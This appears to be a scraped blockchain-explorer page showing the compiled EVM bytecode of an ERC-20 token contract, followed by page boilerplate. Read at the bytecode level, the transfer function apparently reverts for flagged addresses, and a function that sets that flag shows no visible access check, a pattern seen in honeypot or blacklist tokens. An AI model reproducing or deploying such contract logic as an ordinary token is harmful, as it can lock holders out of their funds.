6110ed565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061125e82610e96565b915061126983610e96565b92508261127957611278611224565b5b828204905092915050565b600061128f82610e96565b915061129a83610e96565b92508282039050818111156112b2576112b16110ed565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611314602483610d8c565b915061131f826112b8565b604082019050919050565b6000602082019050818103600083015261134381611307565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006113a6602283610d8c565b91506113b18261134a565b604082019050919050565b600060208201905081810360008301526113d581611399565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611412601d83610d8c565b915061141d826113dc565b602082019050919050565b6000602082019050818103600083015261144181611405565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006114a4602583610d8c565b91506114af82611448565b604082019050919050565b600060208201905081810360008301526114d381611497565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611536602383610d8c565b9150611541826114da565b604082019050919050565b6000602082019050818103600083015261156581611529565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006115c8602683610d8c565b91506115d38261156c565b604082019050919050565b600060208201905081810360008301526115f7816115bb565b905091905056fea2646970667358221220e1df4b873037097c124be8ab07a771ccee96f0b1b3deb003a0c9daf4cecdaebd64736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063b71ff95211610066578063b71ff952146102eb578063dd62ed3e1461031b578063f1d6512e1461034b578063f851a4401461036757610100565b806370a082311461023d57806395d89b411461026d578063a457c2d71461028b578063a9059cbb146102bb57610100565b80632b14ca56116100d35780632b14ca56146101a1578063313ce567146101bf57806339509351146101dd5780635342acb41461020d57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610385565b60405161011a9190610e11565b60405180910390f35b61013d60048036038101906101389190610ecc565b610417565b60405161014a9190610f27565b60405180910390f35b61015b61043a565b6040516101689190610f51565b60405180910390f35b61018b60048036038101906101869190610f6c565b610444565b6040516101989190610f27565b60405180910390f35b6101a9610473565b6040516101b69190610f51565b60405180910390f35b6101c7610479565b6040516101d49190610fdb565b60405180910390f35b6101f760048036038101906101f29190610ecc565b610482565b6040516102049190610f27565b60405180910390f35b61022760048036038101906102229190610ff6565b6104b9565b6040516102349190610f27565b60405180910390f35b61025760048036038101906102529190610ff6565b6104d9565b6040516102649190610f51565b60405180910390f35b610275610521565b6040516102829190610e11565b60405180910390f35b6102a560048036038101906102a09190610ecc565b6105b3565b6040516102b29190610f27565b60405180910390f35b6102d560048036038101906102d09190610ecc565b61062a565b6040516102e29190610f27565b60405180910390f35b61030560048036038101906103009190610ff6565b61077c565b6040516103129190610f27565b60405180910390f35b61033560048036038101906103309190611023565b61079c565b6040516103429190610f51565b60405180910390f35b61036560048036038101906103609190610ff6565b610823565b005b61036f61087e565b60405161037c9190611072565b60405180910390f35b606060038054610394906110bc565b80601f01602080910402602001604051908101604052809291908181526020018280546103c0906110bc565b801561040d5780601f106103e25761010080835404028352916020019161040d565b820191906000526020600020905b8154815290600101906020018083116103f057829003601f168201915b5050505050905090565b6000806104226108a4565b905061042f8185856108ac565b600191505092915050565b6000600254905090565b60008061044f6108a4565b905061045c858285610a75565b610467858585610b01565b60019150509392505050565b60065481565b60006012905090565b60008061048d6108a4565b90506104ae81858561049f858961079c565b6104a9919061111c565b6108ac565b600191505092915050565b60076020528060005260406000206000915054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060048054610530906110bc565b80601f016020809104026020016040519081016040528092919081815260200182805461055c906110bc565b80156105a95780601f1061057e576101008083540402835291602001916105a9565b820191906000526020600020905b81548152906001019060200180831161058c57829003601f168201915b5050505050905090565b6000806105be6108a4565b905060006105cc828661079c565b905083811015610611576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610608906111c2565b60405180910390fd5b61061e82868684036108ac565b60019250505092915050565b6000600860006106386108a4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561068a57600080fd5b600760006106966108a4565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156106fa576106f56106ee6108a4565b8484610b01565b610772565b60006127106006548461070d91906111e2565b6107179190611253565b9050600081846107279190611284565b905061075d6107346108a4565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610b01565b61076f6107686108a4565b8683610b01565b50505b6001905092915050565b60086020528060005260406000206000915054906101000a900460ff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6001600860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361091b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109129061132a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361098a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610981906113bc565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a689190610f51565b60405180910390a3505050565b6000610a81848461079c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610afb5781811015610aed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae490611428565b60405180910390fd5b610afa84848484036108ac565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b67906114ba565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bdf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd69061154c565b60405180910390fd5b610bea838383610d77565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c67906115de565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d5e9190610f51565b60405180910390a3610d71848484610d7c565b50505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610dbb578082015181840152602081019050610da0565b60008484015250505050565b6000601f19601f8301169050919050565b6000610de382610d81565b610ded8185610d8c565b9350610dfd818560208601610d9d565b610e0681610dc7565b840191505092915050565b60006020820190508181036000830152610e2b8184610dd8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e6382610e38565b9050919050565b610e7381610e58565b8114610e7e57600080fd5b50565b600081359050610e9081610e6a565b92915050565b6000819050919050565b610ea981610e96565b8114610eb457600080fd5b50565b600081359050610ec681610ea0565b92915050565b60008060408385031215610ee357610ee2610e33565b5b6000610ef185828601610e81565b9250506020610f0285828601610eb7565b9150509250929050565b60008115159050919050565b610f2181610f0c565b82525050565b6000602082019050610f3c6000830184610f18565b92915050565b610f4b81610e96565b82525050565b6000602082019050610f666000830184610f42565b92915050565b600080600060608486031215610f8557610f84610e33565b5b6000610f9386828701610e81565b9350506020610fa486828701610e81565b9250506040610fb586828701610eb7565b9150509250925092565b600060ff82169050919050565b610fd581610fbf565b82525050565b6000602082019050610ff06000830184610fcc565b92915050565b60006020828403121561100c5761100b610e33565b5b600061101a84828501610e81565b91505092915050565b6000806040838503121561103a57611039610e33565b5b600061104885828601610e81565b925050602061105985828601610e81565b9150509250929050565b61106c81610e58565b82525050565b60006020820190506110876000830184611063565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806110d457607f821691505b6020821081036110e7576110e661108d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061112782610e96565b915061113283610e96565b925082820190508082111561114a576111496110ed565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006111ac602583610d8c565b91506111b782611150565b604082019050919050565b600060208201905081810360008301526111db8161119f565b9050919050565b60006111ed82610e96565b91506111f883610e96565b925082820261120681610e96565b9150828204841483151761121d5761121c6110ed565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061125e82610e96565b915061126983610e96565b92508261127957611278611224565b5b828204905092915050565b600061128f82610e96565b915061129a83610e96565b92508282039050818111156112b2576112b16110ed565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611314602483610d8c565b915061131f826112b8565b604082019050919050565b6000602082019050818103600083015261134381611307565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006113a6602283610d8c565b91506113b18261134a565b604082019050919050565b600060208201905081810360008301526113d581611399565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611412601d83610d8c565b915061141d826113dc565b602082019050919050565b6000602082019050818103600083015261144181611405565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006114a4602583610d8c565b91506114af82611448565b604082019050919050565b600060208201905081810360008301526114d381611497565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611536602383610d8c565b9150611541826114da565b604082019050919050565b6000602082019050818103600083015261156581611529565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006115c8602683610d8c565b91506115d38261156c565b604082019050919050565b600060208201905081810360008301526115f7816115bb565b905091905056fea2646970667358221220e1df4b873037097c124be8ab07a771ccee96f0b1b3deb003a0c9daf4cecdaebd64736f6c63430008120033
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.